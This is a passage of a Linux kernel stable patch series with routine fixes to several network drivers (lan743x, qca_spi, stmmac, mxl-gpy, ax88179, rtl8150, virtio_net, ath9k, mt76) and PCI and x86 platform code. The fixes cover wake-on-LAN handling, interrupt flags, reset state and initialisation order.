+ 	struct net_device *netdev = pci_get_drvdata(pdev);
+ 	struct lan743x_adapter *adapter = netdev_priv(netdev);
++	u32 data;
+ 	int ret;
+ 
+ 	pci_set_power_state(pdev, PCI_D0);
+@@ -3666,6 +3677,30 @@ static int lan743x_pm_resume(struct device *dev)
+ 		return ret;
+ 	}
+ 
++	ret = lan743x_csr_read(adapter, MAC_WK_SRC);
++	netif_dbg(adapter, drv, adapter->netdev,
++		  "Wakeup source : 0x%08X\n", ret);
++
++	/* Clear the wol configuration and status bits. Note that
++	 * the status bits are "Write One to Clear (W1C)"
++	 */
++	data = MAC_WUCSR_EEE_TX_WAKE_ | MAC_WUCSR_EEE_RX_WAKE_ |
++	       MAC_WUCSR_RFE_WAKE_FR_ | MAC_WUCSR_PFDA_FR_ | MAC_WUCSR_WUFR_ |
++	       MAC_WUCSR_MPR_ | MAC_WUCSR_BCAST_FR_;
++	lan743x_csr_write(adapter, MAC_WUCSR, data);
++
++	data = MAC_WUCSR2_NS_RCD_ | MAC_WUCSR2_ARP_RCD_ |
++	       MAC_WUCSR2_IPV6_TCPSYN_RCD_ | MAC_WUCSR2_IPV4_TCPSYN_RCD_;
++	lan743x_csr_write(adapter, MAC_WUCSR2, data);
++
++	data = MAC_WK_SRC_ETH_PHY_WK_ | MAC_WK_SRC_IPV6_TCPSYN_RCD_WK_ |
++	       MAC_WK_SRC_IPV4_TCPSYN_RCD_WK_ | MAC_WK_SRC_EEE_TX_WK_ |
++	       MAC_WK_SRC_EEE_RX_WK_ | MAC_WK_SRC_RFE_FR_WK_ |
++	       MAC_WK_SRC_PFDA_FR_WK_ | MAC_WK_SRC_MP_FR_WK_ |
++	       MAC_WK_SRC_BCAST_FR_WK_ | MAC_WK_SRC_WU_FR_WK_ |
++	       MAC_WK_SRC_WK_FR_SAVED_;
++	lan743x_csr_write(adapter, MAC_WK_SRC, data);
++
+ 	/* open netdev when netdev is at running state while resume.
+ 	 * For instance, it is true when system wakesup after pm-suspend
+ 	 * However, it is false when system wakes up after suspend GUI menu
+@@ -3674,9 +3709,6 @@ static int lan743x_pm_resume(struct device *dev)
+ 		lan743x_netdev_open(netdev);
+ 
+ 	netif_device_attach(netdev);
+-	ret = lan743x_csr_read(adapter, MAC_WK_SRC);
+-	netif_info(adapter, drv, adapter->netdev,
+-		   "Wakeup source : 0x%08X\n", ret);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.h b/drivers/net/ethernet/microchip/lan743x_main.h
+index d304be17b9d82..92a5660b88202 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.h
++++ b/drivers/net/ethernet/microchip/lan743x_main.h
+@@ -61,6 +61,7 @@
+ #define PMT_CTL_RX_FCT_RFE_D3_CLK_OVR_		BIT(18)
+ #define PMT_CTL_GPIO_WAKEUP_EN_			BIT(15)
+ #define PMT_CTL_EEE_WAKEUP_EN_			BIT(13)
++#define PMT_CTL_RES_CLR_WKP_MASK_		GENMASK(9, 8)
+ #define PMT_CTL_READY_				BIT(7)
+ #define PMT_CTL_ETH_PHY_RST_			BIT(4)
+ #define PMT_CTL_WOL_EN_				BIT(3)
+@@ -227,12 +228,31 @@
+ #define MAC_WUCSR				(0x140)
+ #define MAC_MP_SO_EN_				BIT(21)
+ #define MAC_WUCSR_RFE_WAKE_EN_			BIT(14)
++#define MAC_WUCSR_EEE_TX_WAKE_			BIT(13)
++#define MAC_WUCSR_EEE_RX_WAKE_			BIT(11)
++#define MAC_WUCSR_RFE_WAKE_FR_			BIT(9)
++#define MAC_WUCSR_PFDA_FR_			BIT(7)
++#define MAC_WUCSR_WUFR_				BIT(6)
++#define MAC_WUCSR_MPR_				BIT(5)
++#define MAC_WUCSR_BCAST_FR_			BIT(4)
+ #define MAC_WUCSR_PFDA_EN_			BIT(3)
+ #define MAC_WUCSR_WAKE_EN_			BIT(2)
+ #define MAC_WUCSR_MPEN_				BIT(1)
+ #define MAC_WUCSR_BCST_EN_			BIT(0)
+ 
+ #define MAC_WK_SRC				(0x144)
++#define MAC_WK_SRC_ETH_PHY_WK_			BIT(17)
++#define MAC_WK_SRC_IPV6_TCPSYN_RCD_WK_		BIT(16)
++#define MAC_WK_SRC_IPV4_TCPSYN_RCD_WK_		BIT(15)
++#define MAC_WK_SRC_EEE_TX_WK_			BIT(14)
++#define MAC_WK_SRC_EEE_RX_WK_			BIT(13)
++#define MAC_WK_SRC_RFE_FR_WK_			BIT(12)
++#define MAC_WK_SRC_PFDA_FR_WK_			BIT(11)
++#define MAC_WK_SRC_MP_FR_WK_			BIT(10)
++#define MAC_WK_SRC_BCAST_FR_WK_			BIT(9)
++#define MAC_WK_SRC_WU_FR_WK_			BIT(8)
++#define MAC_WK_SRC_WK_FR_SAVED_			BIT(7)
++
+ #define MAC_MP_SO_HI				(0x148)
+ #define MAC_MP_SO_LO				(0x14C)
+ 
+@@ -295,6 +315,10 @@
+ #define RFE_INDX(index)			(0x580 + (index << 2))
+ 
+ #define MAC_WUCSR2			(0x600)
++#define MAC_WUCSR2_NS_RCD_		BIT(7)
++#define MAC_WUCSR2_ARP_RCD_		BIT(6)
++#define MAC_WUCSR2_IPV6_TCPSYN_RCD_	BIT(5)
++#define MAC_WUCSR2_IPV4_TCPSYN_RCD_	BIT(4)
+ 
+ #define SGMII_ACC			(0x720)
+ #define SGMII_ACC_SGMII_BZY_		BIT(31)
+@@ -1010,6 +1034,8 @@ enum lan743x_sgmii_lsd {
+ 	LINK_2500_SLAVE
+ };
+ 
++#define MAC_SUPPORTED_WAKES  (WAKE_BCAST | WAKE_UCAST | WAKE_MCAST | \
++			      WAKE_MAGIC | WAKE_ARP)
+ struct lan743x_adapter {
+ 	struct net_device       *netdev;
+ 	struct mii_bus		*mdiobus;
+@@ -1017,6 +1043,8 @@ struct lan743x_adapter {
+ #ifdef CONFIG_PM
+ 	u32			wolopts;
+ 	u8			sopass[SOPASS_MAX];
++	u32			phy_wolopts;
++	u32			phy_wol_supported;
+ #endif
+ 	struct pci_dev		*pdev;
+ 	struct lan743x_csr      csr;
+diff --git a/drivers/net/ethernet/qualcomm/qca_debug.c b/drivers/net/ethernet/qualcomm/qca_debug.c
+index a739c06ede4e7..972d8f52c5a21 100644
+--- a/drivers/net/ethernet/qualcomm/qca_debug.c
++++ b/drivers/net/ethernet/qualcomm/qca_debug.c
+@@ -111,10 +111,8 @@ qcaspi_info_show(struct seq_file *s, void *what)
+ 
+ 	seq_printf(s, "IRQ              : %d\n",
+ 		   qca->spi_dev->irq);
+-	seq_printf(s, "INTR REQ         : %u\n",
+-		   qca->intr_req);
+-	seq_printf(s, "INTR SVC         : %u\n",
+-		   qca->intr_svc);
++	seq_printf(s, "INTR             : %lx\n",
++		   qca->intr);
+ 
+ 	seq_printf(s, "SPI max speed    : %lu\n",
+ 		   (unsigned long)qca->spi_dev->max_speed_hz);
+diff --git a/drivers/net/ethernet/qualcomm/qca_spi.c b/drivers/net/ethernet/qualcomm/qca_spi.c
+index 82f5173a2cfd5..926a087ae1c62 100644
+--- a/drivers/net/ethernet/qualcomm/qca_spi.c
++++ b/drivers/net/ethernet/qualcomm/qca_spi.c
+@@ -49,6 +49,8 @@
+ 
+ #define MAX_DMA_BURST_LEN 5000
+ 
++#define SPI_INTR 0
++
+ /*   Modules parameters     */
+ #define QCASPI_CLK_SPEED_MIN 1000000
+ #define QCASPI_CLK_SPEED_MAX 16000000
+@@ -593,14 +595,14 @@ qcaspi_spi_thread(void *data)
+ 			continue;
+ 		}
+ 
+-		if ((qca->intr_req == qca->intr_svc) &&
++		if (!test_bit(SPI_INTR, &qca->intr) &&
+ 		    !qca->txr.skb[qca->txr.head])
+ 			schedule();
+ 
+ 		set_current_state(TASK_RUNNING);
+ 
+-		netdev_dbg(qca->net_dev, "have work to do. int: %d, tx_skb: %p\n",
+-			   qca->intr_req - qca->intr_svc,
++		netdev_dbg(qca->net_dev, "have work to do. int: %lu, tx_skb: %p\n",
++			   qca->intr,
+ 			   qca->txr.skb[qca->txr.head]);
+ 
+ 		qcaspi_qca7k_sync(qca, QCASPI_EVENT_UPDATE);
+@@ -614,8 +616,7 @@ qcaspi_spi_thread(void *data)
+ 			msleep(QCASPI_QCA7K_REBOOT_TIME_MS);
+ 		}
+ 
+-		if (qca->intr_svc != qca->intr_req) {
+-			qca->intr_svc = qca->intr_req;
++		if (test_and_clear_bit(SPI_INTR, &qca->intr)) {
+ 			start_spi_intr_handling(qca, &intr_cause);
+ 
+ 			if (intr_cause & SPI_INT_CPU_ON) {
+@@ -677,7 +678,7 @@ qcaspi_intr_handler(int irq, void *data)
+ {
+ 	struct qcaspi *qca = data;
+ 
+-	qca->intr_req++;
++	set_bit(SPI_INTR, &qca->intr);
+ 	if (qca->spi_thread)
+ 		wake_up_process(qca->spi_thread);
+ 
+@@ -693,8 +694,7 @@ qcaspi_netdev_open(struct net_device *dev)
+ 	if (!qca)
+ 		return -EINVAL;
+ 
+-	qca->intr_req = 1;
+-	qca->intr_svc = 0;
++	set_bit(SPI_INTR, &qca->intr);
+ 	qca->sync = QCASPI_SYNC_UNKNOWN;
+ 	qcafrm_fsm_init_spi(&qca->frm_handle);
+ 
+diff --git a/drivers/net/ethernet/qualcomm/qca_spi.h b/drivers/net/ethernet/qualcomm/qca_spi.h
+index 3067356106f0b..58ad910068d4b 100644
+--- a/drivers/net/ethernet/qualcomm/qca_spi.h
++++ b/drivers/net/ethernet/qualcomm/qca_spi.h
+@@ -93,8 +93,7 @@ struct qcaspi {
+ 	struct qcafrm_handle frm_handle;
+ 	struct sk_buff *rx_skb;
+ 
+-	unsigned int intr_req;
+-	unsigned int intr_svc;
++	unsigned long intr;
+ 	u16 reset_count;
+ 
+ #ifdef CONFIG_DEBUG_FS
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
+index 8b50f03056b7b..c0150c5d4781d 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
+@@ -176,6 +176,7 @@ static void timestamp_interrupt(struct stmmac_priv *priv)
+ {
+ 	u32 num_snapshot, ts_status, tsync_int;
+ 	struct ptp_clock_event event;
++	u32 acr_value, channel;
+ 	unsigned long flags;
+ 	u64 ptp_time;
+ 	int i;
+@@ -201,12 +202,15 @@ static void timestamp_interrupt(struct stmmac_priv *priv)
+ 	num_snapshot = (ts_status & GMAC_TIMESTAMP_ATSNS_MASK) >>
+ 		       GMAC_TIMESTAMP_ATSNS_SHIFT;
+ 
++	acr_value = readl(priv->ptpaddr + PTP_ACR);
++	channel = ilog2(FIELD_GET(PTP_ACR_MASK, acr_value));
++
+ 	for (i = 0; i < num_snapshot; i++) {
+ 		read_lock_irqsave(&priv->ptp_lock, flags);
+ 		get_ptptime(priv->ptpaddr, &ptp_time);
+ 		read_unlock_irqrestore(&priv->ptp_lock, flags);
+ 		event.type = PTP_CLOCK_EXTTS;
+-		event.index = 0;
++		event.index = channel;
+ 		event.timestamp = ptp_time;
+ 		ptp_clock_event(priv->ptp_clock, &event);
+ 	}
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+index 074ff289eaf25..5eb8c6713e456 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+@@ -358,24 +358,28 @@ static int tc_setup_cbs(struct stmmac_priv *priv,
+ 
+ 	port_transmit_rate_kbps = qopt->idleslope - qopt->sendslope;
+ 
+-	/* Port Transmit Rate and Speed Divider */
+-	switch (div_s64(port_transmit_rate_kbps, 1000)) {
+-	case SPEED_10000:
+-	case SPEED_5000:
+-		ptr = 32;
+-		break;
+-	case SPEED_2500:
+-	case SPEED_1000:
+-		ptr = 8;
+-		break;
+-	case SPEED_100:
+-		ptr = 4;
+-		break;
+-	default:
+-		netdev_err(priv->dev,
+-			   "Invalid portTransmitRate %lld (idleSlope - sendSlope)\n",
+-			   port_transmit_rate_kbps);
+-		return -EINVAL;
++	if (qopt->enable) {
++		/* Port Transmit Rate and Speed Divider */
++		switch (div_s64(port_transmit_rate_kbps, 1000)) {
++		case SPEED_10000:
++		case SPEED_5000:
++			ptr = 32;
++			break;
++		case SPEED_2500:
++		case SPEED_1000:
++			ptr = 8;
++			break;
++		case SPEED_100:
++			ptr = 4;
++			break;
++		default:
++			netdev_err(priv->dev,
++				   "Invalid portTransmitRate %lld (idleSlope - sendSlope)\n",
++				   port_transmit_rate_kbps);
++			return -EINVAL;
++		}
++	} else {
++		ptr = 0;
+ 	}
+ 
+ 	mode_to_use = priv->plat->tx_queues_cfg[queue].mode_to_use;
+diff --git a/drivers/net/phy/mxl-gpy.c b/drivers/net/phy/mxl-gpy.c
+index cae24091fb6f7..f07760e0455d5 100644
+--- a/drivers/net/phy/mxl-gpy.c
++++ b/drivers/net/phy/mxl-gpy.c
+@@ -95,6 +95,14 @@ struct gpy_priv {
+ 
+ 	u8 fw_major;
+ 	u8 fw_minor;
++	u32 wolopts;
++
++	/* It takes 3 seconds to fully switch out of loopback mode before
++	 * it can safely re-enter loopback mode. Record the time when
++	 * loopback is disabled. Check and wait if necessary before loopback
++	 * is enabled.
++	 */
++	u64 lb_dis_to;
+ };
+ 
+ static const struct {
+@@ -202,6 +210,15 @@ static int gpy_hwmon_register(struct phy_device *phydev)
+ }
+ #endif
+ 
++static int gpy_ack_interrupt(struct phy_device *phydev)
++{
++	int ret;
++
++	/* Clear all pending interrupts */
++	ret = phy_read(phydev, PHY_ISTAT);
++	return ret < 0 ? ret : 0;
++}
++
+ static int gpy_mbox_read(struct phy_device *phydev, u32 addr)
+ {
+ 	struct gpy_priv *priv = phydev->priv;
+@@ -243,16 +260,8 @@ static int gpy_mbox_read(struct phy_device *phydev, u32 addr)
+ 
+ static int gpy_config_init(struct phy_device *phydev)
+ {
+-	int ret;
+-
+-	/* Mask all interrupts */
+-	ret = phy_write(phydev, PHY_IMASK, 0);
+-	if (ret)
+-		return ret;
+-
+-	/* Clear all pending interrupts */
+-	ret = phy_read(phydev, PHY_ISTAT);
+-	return ret < 0 ? ret : 0;
++	/* Nothing to configure. Configuration Requirement Placeholder */
++	return 0;
+ }
+ 
+ static bool gpy_has_broken_mdint(struct phy_device *phydev)
+@@ -533,11 +542,23 @@ static int gpy_read_status(struct phy_device *phydev)
+ 
+ static int gpy_config_intr(struct phy_device *phydev)
+ {
++	struct gpy_priv *priv = phydev->priv;
+ 	u16 mask = 0;
++	int ret;
++
++	ret = gpy_ack_interrupt(phydev);
++	if (ret)
++		return ret;
+ 
+ 	if (phydev->interrupts == PHY_INTERRUPT_ENABLED)
+ 		mask = PHY_IMASK_MASK;
+ 
++	if (priv->wolopts & WAKE_MAGIC)
++		mask |= PHY_IMASK_WOL;
++
++	if (priv->wolopts & WAKE_PHY)
++		mask |= PHY_IMASK_LSTC;
++
+ 	return phy_write(phydev, PHY_IMASK, mask);
+ }
+ 
+@@ -586,6 +607,7 @@ static int gpy_set_wol(struct phy_device *phydev,
+ 		       struct ethtool_wolinfo *wol)
+ {
+ 	struct net_device *attach_dev = phydev->attached_dev;
++	struct gpy_priv *priv = phydev->priv;
+ 	int ret;
+ 
+ 	if (wol->wolopts & WAKE_MAGIC) {
+@@ -633,6 +655,8 @@ static int gpy_set_wol(struct phy_device *phydev,
+ 		ret = phy_read(phydev, PHY_ISTAT);
+ 		if (ret < 0)
+ 			return ret;
++
++		priv->wolopts |= WAKE_MAGIC;
+ 	} else {
+ 		/* Disable magic packet matching */
+ 		ret = phy_clear_bits_mmd(phydev, MDIO_MMD_VEND2,
+@@ -640,6 +664,13 @@ static int gpy_set_wol(struct phy_device *phydev,
+ 					 WOL_EN);
+ 		if (ret < 0)
+ 			return ret;
++
++		/* Disable the WOL interrupt */
++		ret = phy_clear_bits(phydev, PHY_IMASK, PHY_IMASK_WOL);
++		if (ret < 0)
++			return ret;
++
++		priv->wolopts &= ~WAKE_MAGIC;
+ 	}
+ 
+ 	if (wol->wolopts & WAKE_PHY) {
+@@ -656,9 +687,11 @@ static int gpy_set_wol(struct phy_device *phydev,
+ 		if (ret & (PHY_IMASK_MASK & ~PHY_IMASK_LSTC))
+ 			phy_trigger_machine(phydev);
+ 
++		priv->wolopts |= WAKE_PHY;
+ 		return 0;
+ 	}
+ 
++	priv->wolopts &= ~WAKE_PHY;
+ 	/* Disable the link state change interrupt */
+ 	return phy_clear_bits(phydev, PHY_IMASK, PHY_IMASK_LSTC);
+ }
+@@ -666,34 +699,42 @@ static int gpy_set_wol(struct phy_device *phydev,
+ static void gpy_get_wol(struct phy_device *phydev,
+ 			struct ethtool_wolinfo *wol)
+ {
+-	int ret;
++	struct gpy_priv *priv = phydev->priv;
+ 
+ 	wol->supported = WAKE_MAGIC | WAKE_PHY;
+-	wol->wolopts = 0;
+-
+-	ret = phy_read_mmd(phydev, MDIO_MMD_VEND2, VPSPEC2_WOL_CTL);
+-	if (ret & WOL_EN)
+-		wol->wolopts |= WAKE_MAGIC;
+-
+-	ret = phy_read(phydev, PHY_IMASK);
+-	if (ret & PHY_IMASK_LSTC)
+-		wol->wolopts |= WAKE_PHY;
++	wol->wolopts = priv->wolopts;
+ }
+ 
+ static int gpy_loopback(struct phy_device *phydev, bool enable)
+ {
++	struct gpy_priv *priv = phydev->priv;
++	u16 set = 0;
+ 	int ret;
+ 
+-	ret = phy_modify(phydev, MII_BMCR, BMCR_LOOPBACK,
+-			 enable ? BMCR_LOOPBACK : 0);
+-	if (!ret) {
+-		/* It takes some time for PHY device to switch
+-		 * into/out-of loopback mode.
++	if (enable) {
++		u64 now = get_jiffies_64();
++
++		/* wait until 3 seconds from last disable */
++		if (time_before64(now, priv->lb_dis_to))
++			msleep(jiffies64_to_msecs(priv->lb_dis_to - now));
++
++		set = BMCR_LOOPBACK;
++	}
++
++	ret = phy_modify(phydev, MII_BMCR, BMCR_LOOPBACK, set);
++	if (ret <= 0)
++		return ret;
++
++	if (enable) {
++		/* It takes some time for PHY device to switch into
++		 * loopback mode.
+ 		 */
+ 		msleep(100);
++	} else {
++		priv->lb_dis_to = get_jiffies_64() + HZ * 3;
+ 	}
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int gpy115_loopback(struct phy_device *phydev, bool enable)
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 6d31061818e93..53f6efc22f5c9 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -174,7 +174,6 @@ struct ax88179_data {
+ 	u32 wol_supported;
+ 	u32 wolopts;
+ 	u8 disconnecting;
+-	u8 initialized;
+ };
+ 
+ struct ax88179_int_data {
+@@ -1676,12 +1675,21 @@ static int ax88179_reset(struct usbnet *dev)
+ 
+ static int ax88179_net_reset(struct usbnet *dev)
+ {
+-	struct ax88179_data *ax179_data = dev->driver_priv;
++	u16 tmp16;
+ 
+-	if (ax179_data->initialized)
++	ax88179_read_cmd(dev, AX_ACCESS_PHY, AX88179_PHY_ID, GMII_PHY_PHYSR,
++			 2, &tmp16);
++	if (tmp16) {
++		ax88179_read_cmd(dev, AX_ACCESS_MAC, AX_MEDIUM_STATUS_MODE,
++				 2, 2, &tmp16);
++		if (!(tmp16 & AX_MEDIUM_RECEIVE_EN)) {
++			tmp16 |= AX_MEDIUM_RECEIVE_EN;
++			ax88179_write_cmd(dev, AX_ACCESS_MAC, AX_MEDIUM_STATUS_MODE,
++					  2, 2, &tmp16);
++		}
++	} else {
+ 		ax88179_reset(dev);
+-	else
+-		ax179_data->initialized = 1;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/usb/rtl8150.c b/drivers/net/usb/rtl8150.c
+index 97afd7335d868..01a3b2417a540 100644
+--- a/drivers/net/usb/rtl8150.c
++++ b/drivers/net/usb/rtl8150.c
+@@ -778,7 +778,8 @@ static int rtl8150_get_link_ksettings(struct net_device *netdev,
+ 				      struct ethtool_link_ksettings *ecmd)
+ {
+ 	rtl8150_t *dev = netdev_priv(netdev);
+-	short lpa, bmcr;
++	short lpa = 0;
++	short bmcr = 0;
+ 	u32 supported;
+ 
+ 	supported = (SUPPORTED_10baseT_Half |
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 32cddb633793d..61cc0ed1ddc13 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3818,8 +3818,16 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 			dev->features |= dev->hw_features & NETIF_F_ALL_TSO;
+ 		/* (!csum && gso) case will be fixed by register_netdev() */
+ 	}
+-	if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_CSUM))
+-		dev->features |= NETIF_F_RXCSUM;
++
++	/* 1. With VIRTIO_NET_F_GUEST_CSUM negotiation, the driver doesn't
++	 * need to calculate checksums for partially checksummed packets,
++	 * as they're considered valid by the upper layer.
++	 * 2. Without VIRTIO_NET_F_GUEST_CSUM negotiation, the driver only
++	 * receives fully checksummed packets. The device may assist in
++	 * validating these packets' checksums, so the driver won't have to.
++	 */
++	dev->features |= NETIF_F_RXCSUM;
++
+ 	if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_TSO4) ||
+ 	    virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_TSO6))
+ 		dev->features |= NETIF_F_GRO_HW;
+diff --git a/drivers/net/wireless/ath/ath.h b/drivers/net/wireless/ath/ath.h
+index f02a308a9ffc5..34654f710d8a1 100644
+--- a/drivers/net/wireless/ath/ath.h
++++ b/drivers/net/wireless/ath/ath.h
+@@ -171,8 +171,10 @@ struct ath_common {
+ 	unsigned int clockrate;
+ 
+ 	spinlock_t cc_lock;
+-	struct ath_cycle_counters cc_ani;
+-	struct ath_cycle_counters cc_survey;
++	struct_group(cc,
++		struct ath_cycle_counters cc_ani;
++		struct ath_cycle_counters cc_survey;
++	);
+ 
+ 	struct ath_regulatory regulatory;
+ 	struct ath_regulatory reg_world_copy;
+diff --git a/drivers/net/wireless/ath/ath9k/main.c b/drivers/net/wireless/ath/ath9k/main.c
+index 6360d3356e256..81412a67c1cbd 100644
+--- a/drivers/net/wireless/ath/ath9k/main.c
++++ b/drivers/net/wireless/ath/ath9k/main.c
+@@ -135,8 +135,7 @@ void ath9k_ps_wakeup(struct ath_softc *sc)
+ 	if (power_mode != ATH9K_PM_AWAKE) {
+ 		spin_lock(&common->cc_lock);
+ 		ath_hw_cycle_counters_update(common);
+-		memset(&common->cc_survey, 0, sizeof(common->cc_survey));
+-		memset(&common->cc_ani, 0, sizeof(common->cc_ani));
++		memset(&common->cc, 0, sizeof(common->cc));
+ 		spin_unlock(&common->cc_lock);
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+index 49ddca84f7862..cae7c21ca1f8b 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+@@ -883,6 +883,7 @@ void mt7921_mac_reset_work(struct work_struct *work)
+ 	int i, ret;
+ 
+ 	dev_dbg(dev->mt76.dev, "chip reset\n");
++	set_bit(MT76_RESET, &dev->mphy.state);
+ 	dev->hw_full_reset = true;
+ 	ieee80211_stop_queues(hw);
+ 
+@@ -911,6 +912,7 @@ void mt7921_mac_reset_work(struct work_struct *work)
+ 	}
+ 
+ 	dev->hw_full_reset = false;
++	clear_bit(MT76_RESET, &dev->mphy.state);
+ 	pm->suspended = false;
+ 	ieee80211_wake_queues(hw);
+ 	ieee80211_iterate_active_interfaces(hw,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci_mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci_mac.c
+index 8dd60408b117e..cb20ddcad137c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci_mac.c
+@@ -78,7 +78,6 @@ int mt7921e_mac_reset(struct mt7921_dev *dev)
+ 	mt76_wr(dev, MT_WFDMA0_HOST_INT_ENA, 0);
+ 	mt76_wr(dev, MT_PCIE_MAC_INT_ENABLE, 0x0);
+ 
+-	set_bit(MT76_RESET, &dev->mphy.state);
+ 	set_bit(MT76_MCU_RESET, &dev->mphy.state);
+ 	wake_up(&dev->mt76.mcu.wait);
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+@@ -129,7 +128,6 @@ int mt7921e_mac_reset(struct mt7921_dev *dev)
+ 
+ 	err = __mt7921_start(&dev->phy);
+ out:
+-	clear_bit(MT76_RESET, &dev->mphy.state);
+ 
+ 	local_bh_disable();
+ 	napi_enable(&dev->mt76.tx_napi);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
+index fd07b66233920..46af03803de73 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/sdio_mac.c
+@@ -98,7 +98,6 @@ int mt7921s_mac_reset(struct mt7921_dev *dev)
+ 	mt76_connac_free_pending_tx_skbs(&dev->pm, NULL);
+ 	mt76_txq_schedule_all(&dev->mphy);
+ 	mt76_worker_disable(&dev->mt76.tx_worker);
+-	set_bit(MT76_RESET, &dev->mphy.state);
+ 	set_bit(MT76_MCU_RESET, &dev->mphy.state);
+ 	wake_up(&dev->mt76.mcu.wait);
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+@@ -135,7 +134,6 @@ int mt7921s_mac_reset(struct mt7921_dev *dev)
+ 
+ 	err = __mt7921_start(&dev->phy);
+ out:
+-	clear_bit(MT76_RESET, &dev->mphy.state);
+ 
+ 	mt76_worker_enable(&dev->mt76.tx_worker);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio.c b/drivers/net/wireless/mediatek/mt76/sdio.c
+index fc4fb94635645..2a81c2f663449 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio.c
+@@ -499,7 +499,8 @@ static void mt76s_tx_status_data(struct mt76_worker *worker)
+ 	dev = container_of(sdio, struct mt76_dev, sdio);
+ 
+ 	while (true) {
+-		if (test_bit(MT76_REMOVED, &dev->phy.state))
++		if (test_bit(MT76_RESET, &dev->phy.state) ||
++		    test_bit(MT76_REMOVED, &dev->phy.state))
+ 			break;
+ 
+ 		if (!dev->drv->tx_status_data(dev, &update))
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 67956bfebf879..0399204941dbe 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -2991,6 +2991,18 @@ static const struct dmi_system_id bridge_d3_blacklist[] = {
+ 			DMI_MATCH(DMI_BOARD_VERSION, "Continental Z2"),
+ 		},
+ 	},
++	{
++		/*
++		 * Changing power state of root port dGPU is connected fails
++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/3229
++		 */
++		.ident = "Hewlett-Packard HP Pavilion 17 Notebook PC/1972",
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Hewlett-Packard"),
++			DMI_MATCH(DMI_BOARD_NAME, "1972"),
++			DMI_MATCH(DMI_BOARD_VERSION, "95.33"),
++		},
++	},
+ #endif
+ 	{ }
+ };
+diff --git a/drivers/platform/x86/p2sb.c b/drivers/platform/x86/p2sb.c
+index a64f56ddd4a44..053be5c5e0cad 100644
+--- a/drivers/platform/x86/p2sb.c
++++ b/drivers/platform/x86/p2sb.c
+@@ -56,12 +56,9 @@ static int p2sb_get_devfn(unsigned int *devfn)
+ 	return 0;
+ }
+ 
+-static bool p2sb_valid_resource(struct resource *res)
++static bool p2sb_valid_resource(const struct resource *res)
+ {
+-	if (res->flags)
+-		return true;
+-
+-	return false;
++	return res->flags & ~IORESOURCE_UNSET;
+ }
+ 
+ /* Copy resource from the first BAR of the device in question */
+@@ -220,16 +217,20 @@ EXPORT_SYMBOL_GPL(p2sb_bar);
+ 
+ static int __init p2sb_fs_init(void)
+ {
+-	p2sb_cache_resources();
+-	return 0;
++	return p2sb_cache_resources();
+ }
+ 
+ /*
+- * pci_rescan_remove_lock to avoid access to unhidden P2SB devices can
+- * not be locked in sysfs pci bus rescan path because of deadlock. To
+- * avoid the deadlock, access to P2SB devices with the lock at an early
+- * step in kernel initialization and cache required resources. This
+- * should happen after subsys_initcall which initializes PCI subsystem
+- * and before device_initcall which requires P2SB resources.
++ * pci_rescan_remove_lock() can not be locked in sysfs PCI bus rescan path
++ * because of deadlock. To avoid the deadlock, access P2SB devices with the lock
++ * at an early step in kernel initialization and cache required resources.
++ *
++ * We want to run as early as possible. If the P2SB was assigned a bad BAR,
++ * we'll need to wait on pcibios_assign_resources() to fix it. So, our list of
++ * initcall dependencies looks something like this:
++ *
++ * ...
++ * subsys_initcall (pci_subsys_init)
++ * fs_initcall     (pcibios_assign_resources)
+  */
+-fs_initcall(p2sb_fs_init);
++fs_initcall_sync(p2sb_fs_init);
+diff --git a/drivers/platform/x86/toshiba_acpi.c b/drivers/platform/x86/toshiba_acpi.c
+index 160abd3b3af8b..f10994b94a33a 100644
+--- a/drivers/platform/x86/toshiba_acpi.c
++++ b/drivers/platform/x86/toshiba_acpi.c
+@@ -57,6 +57,11 @@ module_param(turn_on_panel_on_resume, int, 0644);
+ MODULE_PARM_DESC(turn_on_panel_on_resume,
